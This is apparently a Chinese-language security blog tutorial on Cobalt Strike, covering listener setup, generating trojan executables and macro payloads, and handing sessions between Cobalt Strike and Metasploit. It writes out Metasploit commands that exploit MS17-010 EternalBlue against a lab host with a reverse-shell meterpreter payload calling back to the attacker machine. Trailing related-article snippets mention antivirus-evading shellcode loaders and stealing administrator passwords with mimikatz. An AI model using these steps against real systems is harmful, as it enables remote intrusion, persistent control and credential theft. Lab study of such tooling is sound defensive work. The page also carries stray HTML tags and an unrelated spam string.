<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    ?Cobalt Strike基礎使用

    VSole2021-10-28 08:48:39

    Cobalt Strike分為客戶端組件和服務器組件,服務器的組件也是團隊服務器,可以放在局域網或者公網下進行團隊使用,也是Cobalt Strike社會工程功能的托管機器,團隊服務器還可以存儲由Cobalt Strike收集的數據,并且進行日志管理。

    Cobalt Strike服務器必須在Linux系統上運行,這里演示服務器在Linux KALI端,本地進行Cobalt Strike客戶端的連接。

    CobaltStrike集成了端口轉發、服務掃描,自動化溢出,多模式端口監聽,windows exe 木馬生成,windows dll 木馬生成,java 木馬生成,office 宏病毒生成,木馬捆綁。釣魚攻擊包。

    CS使用

    啟動CS服務端

    啟動客戶端

    服務端啟動后客戶端啟動進行連接(團隊多人連接將用戶名設置為自己的用來區分團隊成員)

    主界面

    CS功能使用(主機上線)

    1.設置監聽器用來接收會話

    name:監聽器名字

    payload:payload類型

    Host: shell反彈的主機,kali IP

    Port: 反彈端口

    這里Payload有9種選項,如下:

    內部的Listener

    windows/beacon_dns/reverse_dns_txt

    windows/beacon_dns/reverse_http

    windows/beacon_http/reverse_http

    windows/beacon_https/reverse_https 

    windows/beacon_smb/bind_pipe

    外部的Listener

    windows/foreign/reverse_dns_txt

    windows/foreign/reverse_http

    windows/foreign/reverse_https

    windows/foreign/reverse_tcp

    Beacon為內置的監聽器,在目標主機執行相應的payload,獲取shell到cs上;其中包含DNS、HTTP、HTTPS等,Beacon可以選擇通過DNS還是HTTP/S協議出口網絡,甚至可以在使用Beacon通訊過程中切換HTTP和DNS。其支持多主機連接,部署好Beacon后提交一個要連回的域名或主機的列表,Beacon將通過這些主機輪詢。目標網絡的防護團隊必須攔截所有的列表中的主機才可中斷和其網絡的通訊。通過種種方式獲取shell以后(比如直接運行生成的exe),就可以使用Beacon了。

    Foreign為外部結合的Listener,經常用于MSF的結合,例如獲取meterpreter到MSF上。

    2.生成木馬

    HTML Application 生成惡意的HTA木馬文件;

    MS Office Macro 生成office宏病毒文件;

    Payload Generator 生成各種語言版本的payload;

    Windows Executable 生成可執行exe木馬;

    Windows Executable(S) 生成無狀態的可執行exe木馬

    生成后會保存到指定地方,通過某種方式上傳到對方機器上,可以通過Webshell方式等這里不在講解了

    受害者運行exe文件我們的CS就直接上線了

    這是生成exe文件,還可以生成宏病毒等上面介紹到的。

    3.正常我們進去需要調整響應的時間,sleep 3 就行。

    可以對我們上線的機器進行以下操作,也可以聯動MSF進行使用

    聯動MSF使用

    將MSF的會話轉發到CS上

    通過漏洞復現演示MSF獲取目標Session

    KALI:192.168.50.218

    CS:192.168.50.130

    受害者IP:192.168.50.185

    1.發現漏洞

    Nmap -A掃描目標開放了445端口

    通過使用MSF輔助模塊掃描發現存在ms17_010漏洞

    use auxiliary/scanner/smb/smb_ms17_010

    set rhosts 192.168.50.185

    exploit

    查找漏洞利用模塊

    漏洞利用

    use exploit/windows/smb/ms17_010_eternalblue

    set payload windows/x64/meterpreter/reverse_tcp

    set RHOST 192.168.50.185

    Run

    獲取后 我們background獲取session

    與CS聯動,將會話轉發到CS中

    CS配置新建一個監聽

    KALI中配置

    use exploit/windows/local/payload_inject

    set payload windows/meterpreter/reverse_http

    set DisablePayloadHandler true

    set lhost 192.168.50.218 //KALI IP

    set lport 4443 與CS同端口

    set session 1

    CS這邊就接收到了MSF的會話

    CS的會話轉發到MSF中

    由于生成的木馬就是HTTP的,所以委派給msf時,監聽器還是HTTP的

    CS添加一個監聽器

    MSF準備

    Use exploit/multi/handler

    Set payload windows/meterpreter/reverse_http

    Set lhost ip

    Set lport ip

    設置完成后我們就可以使用CS進行委派會話了

    選中我們剛剛創建的就行

    這樣我們的MSF端就會獲取到這個會話

    CS還有非常多的功能,大家慢慢發現

    beaconmsf
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    CobaltStrike與MSF聯動
    2021-11-18 07:52:49
    CobalStrike更適合做個穩控平臺,輕型的遠控工具,內置Windows系統類模塊較多,Metasploit更擅長各類內網搜集和漏洞利用,包含多類型操作系統模塊,但是使用起來“比較笨重”。
    如果成功連接到管道, 使用WriteFile函數將shellcode數據寫入已連接的命名管道。使用IDA分析檢查導出函數:第一個是反射式DLL注入,限于篇幅,在本篇中不展開分析第二個是DLL的入口函數。在后續的文章中,會根據檢測特征和csprofile的繞過按照專題進行分析。同時,大部分的CS檢測特征都是在此。而在后續的文章分析中,將會著重的分析CS beacon中使用到的幾種DLL注入方式;beacon config的檢測;同時結合CS profile 的配置,研究一下CS的對抗檢測方式。
    SMB Beacon 與命名管道在 Windows 中,無管理員權限的情況下,即無法添加白名單。定義特定版本的協議的消息數據包集稱為方言。進行身份驗證后,用戶可以訪問服務器上不受共享級別安全性保護的所有共享。
    然后設置host,port以及要傳回去的session我們可以看到CS上返回了一個system權限的shell這個時候我們就可以愉快的使用mimikatz等工具來把administrator的密碼偷來但是有的機器改了RDP服務的端口怎么辦呢,我們可以用cs的進程管理,找到rdp服務的PID,然后在beacon中輸入powershell?
    2021年5月13日:c++ shellcode啟動器,截至2021年5月13日,0/26完全未被檢測到。在KaliLinux上,只需'apt-get install mingw-w64*'就可以了!使用git clone存儲庫,生成命名為beacon.bin的shellcode文件,然后運行charlotte.py注:使用msfvenom -p測試以及CobaltStrike原始格式Payload!
    WebServer特征本文簡單介紹了Cobalt Stike 4.4版本的一些特征以及緩解措施。webser
    但其實 Jboss 的這個路徑可以查看到日志
    前言 CobalStrike 與 Metasploit 均是滲透利器,各有所長。前者更適合做穩控平臺,后者則更擅長內網各類探測搜集與漏洞利用。 兩者更需要靈活的聯動,各自相互依托,從而提升滲透的效率。 內置Socks功能 通過Beacon內置的socks功能在VPS上開啟代理端口,打通目標內網通道,之后將本地Metasploit直接帶入目標內網,進行橫向滲透。 當然,也可以把代理設置在其他的
    https://www.freebuf.com/sectool/389399.html
    #默認情況下,payload_inject執行之后會在本地產生一個新的handler,由于已經有了一個不需要再產生一個,所以這里設置為true. #這里是當前獲得的session的id. 可以看到 cs 成功接收到 shell右鍵 Interact 調出 beacon 界面,net view 查看當前域中計算機列表,然后執行 shell 命令前面加上 shell 就可以了,例如 shell ipconfig四、制作木馬首先創建監聽器用于木馬回連,Host 為 cs 服務端的 ipAttacks->Packages->Windows Executable?需要派生的目標右擊選擇Spawn,然后創建一個?
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类